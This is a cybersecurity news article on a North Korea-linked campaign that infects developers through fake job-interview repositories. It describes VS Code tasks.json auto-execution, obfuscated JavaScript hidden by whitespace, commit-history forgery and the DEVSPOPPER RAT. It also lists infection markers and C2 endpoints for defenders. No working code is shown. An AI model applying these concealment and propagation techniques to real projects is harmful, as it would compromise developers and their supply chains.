Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
Mythos Ransomware Returns, Kali Linux 2024.2 Released, WhatsApp Vulnerability
July 5, 2026
Microsoft Patches Windows 11 OOBE Flaw in Cumulative Update
July 5, 2026
PamStealer Mimics Maccy, Silently Harvests Data
July 4, 2026
Home/Threats/Dokkaebi Hackers Target Developers with Fake Job Interviews and Malware
Threats

Dokkaebi Hackers Target Developers with Fake Job Interviews and Malware

Key Takeaways A North Korea-linked hacking group, Void Dokkaebi (also known as Famous Chollima), is actively targeting software developers through elaborate fake job interviews. The attackers trick...

Jennifer sherman
Jennifer sherman
April 24, 2026 5 Min Read
45 0

Key Takeaways

  • A North Korea-linked hacking group, Void Dokkaebi (also known as Famous Chollima), is actively targeting software developers through elaborate fake job interviews.
  • The attackers trick developers into cloning malicious code repositories that install malware, subsequently turning the victims’ own machines and projects into tools for further infection.
  • The campaign leverages compromised repositories to spread malware in a worm-like fashion, bypassing traditional social engineering for subsequent victims.
  • By March 2026, over 750 infected repositories and 500 malicious VS Code task configurations were identified, impacting popular open-source projects like DataStax and Neutralinojs.
  • The primary payload is a sophisticated, cross-platform Remote Access Trojan (RAT) called DEVSPOPPER, designed to evade detection in CI/CD environments and cloud sandboxes.

North Korean Hackers Exploit Fake Job Interviews to Infect Developers, Propagate Malware Through Code Repositories

A sophisticated campaign orchestrated by the North Korea-backed hacking collective known as Void Dokkaebi (or Famous Chollima) is actively compromising software developers. The group employs an elaborate social engineering tactic, using fabricated job interviews to lure developers into installing malware, which then propagates through their existing code repositories. This insidious method transforms individual developer machines and projects into vectors for widespread infection, as detailed in a recent security analysis.

Table Of Content

  • Key Takeaways
  • North Korean Hackers Exploit Fake Job Interviews to Infect Developers, Propagate Malware Through Code Repositories
  • The Worm-like Propagation Mechanism
  • Inside the Infection Chain
  • Visual Studio Code Workspace Abuse
  • Direct Code Injection and Git Tampering
  • What You Should Do

The attack chain commences with a highly convincing ruse. Threat actors impersonate recruiters from prominent cryptocurrency and artificial intelligence companies, initiating contact with developers on professional networking platforms. During the course of a seemingly legitimate interview, the target is instructed to clone a specific code repository from platforms such as GitHub, GitLab, or Bitbucket, ostensibly for a “technical assessment.”

These repositories, while appearing genuine, contain hidden malicious code designed to execute automatically upon the developer opening the project folder. This initial compromise is particularly dangerous because it leverages the developer’s trust in a professional context, turning a routine technical exercise into a critical security incident.

The Worm-like Propagation Mechanism

What sets this campaign apart, as identified by Trend Micro analysts, is its self-propagating nature. Void Dokkaebi does not merely aim for a single developer compromise. Instead, the attackers exploit the initial victim’s machine and their existing repositories to infect subsequent developers, establishing a worm-like chain that can spread across organizations without requiring additional social engineering efforts for each new target.

By March 2026, the scale of this operation had grown substantially. Trend Micro Research’s analysis uncovered over 750 infected repositories, more than 500 malicious Visual Studio Code task configurations, and 101 instances of a specialized commit tampering tool across various public code hosting platforms. Notably, repositories associated with well-known organizations like DataStax and Neutralinojs were found to contain infection markers, indicating the campaign’s reach into popular open-source projects.

Once a compromised developer pushes code to GitHub or integrates components elsewhere, the malicious files travel with these updates. They lie dormant, awaiting the next developer to open the project and inadvertently trigger the attack, thereby perpetuating a cycle of infection that expands with every new commit.

Inside the Infection Chain

The Void Dokkaebi campaign employs two primary, complementary infection methods:

Visual Studio Code Workspace Abuse

The first method exploits Visual Studio Code’s workspace files, specifically the hidden .vscode/tasks.json file. This file is configured to execute automatically when a developer opens the project folder. Upon accepting the workspace trust prompt, the malicious task runs without further user interaction. It either fetches a backdoor from a remote URL or launches a disguised payload file already present within the repository.

Infection paths used by Void Dokkaebi (Source - Trend Micro)
Infection paths used by Void Dokkaebi (Source – Trend Micro)

Direct Code Injection and Git Tampering

The second method is more direct. After establishing remote access to a developer’s machine, the attackers inject obfuscated JavaScript into the victim’s source files within their own repositories. This injected code is pushed to the far right of the screen using extensive whitespace, making it difficult to detect during quick code reviews. A batch script named temp_auto_push.bat is then used to rewrite Git commit history. It copies the original author name, timestamp, and message before force-pushing the tampered version, making the malicious commit appear legitimate and blend seamlessly into the project history.

Code snippets of a GitHub repository containing the injected code (Source - Trend Micro)
Code snippets of a GitHub repository containing the injected code (Source – Trend Micro)

The payload delivered by this campaign is a variant of the DEVSPOPPER remote access trojan (RAT). This cross-platform, Node.js-based tool establishes communication with a command-and-control (C2) server via WebSocket and employs HTTP for data exfiltration. A notable feature of DEVSPOPPER is its multi-operator session system, which permits multiple threat actors to simultaneously operate on a single compromised machine. Crucially, the RAT is designed to detect and avoid execution in CI/CD environments and cloud sandboxes, ensuring it runs exclusively on genuine developer workstations, thereby evading automated pipeline scanning tools.

What You Should Do

  • Isolate Interview Code: Always execute any code provided during job interviews in isolated or disposable virtual environments (e.g., VMs, sandboxes). Never run such code directly on personal or production machines.
  • Configure Gitignore: Add .vscode/ to your .gitignore files and enforce this policy across all organizational repositories. This prevents the passive spread of malicious Visual Studio Code configurations.
  • Enforce Signed Commits: Implement mandatory GPG- or SSH-signed commits with branch protection and required pull requests for all repositories. This measure can effectively thwart the commit-tampering tool used by Void Dokkaebi.
  • Audit Source Code: Regularly audit source code for specific infection markers such as global['!'] and global['_V'], and check for the presence of the temp_auto_push.bat script.
  • Monitor Outbound Connections: Monitor developer workstations for unusual outbound connections, particularly to blockchain API endpoints like api.trongrid.io and Binance Smart Chain RPC endpoints, which may indicate C2 communication.
  • Prioritize Endpoint Detection: Given that the DEVSPOPPER RAT is designed to bypass CI/CD environments, robust endpoint-level detection and response (EDR) solutions on developer workstations are critical for identifying and mitigating infections.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackHackerMalwareThreat

Share Article

Jennifer sherman

Jennifer sherman

Jennifer is a cybersecurity news reporter covering data breaches, ransomware campaigns, and dark web markets. With a background in incident response, Jennifer provides unique insights into how organizations respond to cyber attacks and the evolving tactics of threat actors. Her reporting has covered major breaches affecting millions of users and has helped organizations understand emerging threats. Jennifer combines technical knowledge with investigative journalism to deliver in-depth coverage of cybersecurity incidents.

Previous Post

Python 3.9.0-3.9.7 Critical Vulnerability Allows Arbitrary Code Execution

Next Post

Hackers Exploit Telegram Desktop Vulnerability to Steal User Sessions

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
India Bans Apps Used to Remotely Disable E-Rickshaws
July 3, 2026
The Future of Encryption: Top Post-Quantum Cryptography Solutions for 2026
July 3, 2026
Alibaba Bans Internal Use of Claude AI Over Backdoor Concerns
July 3, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us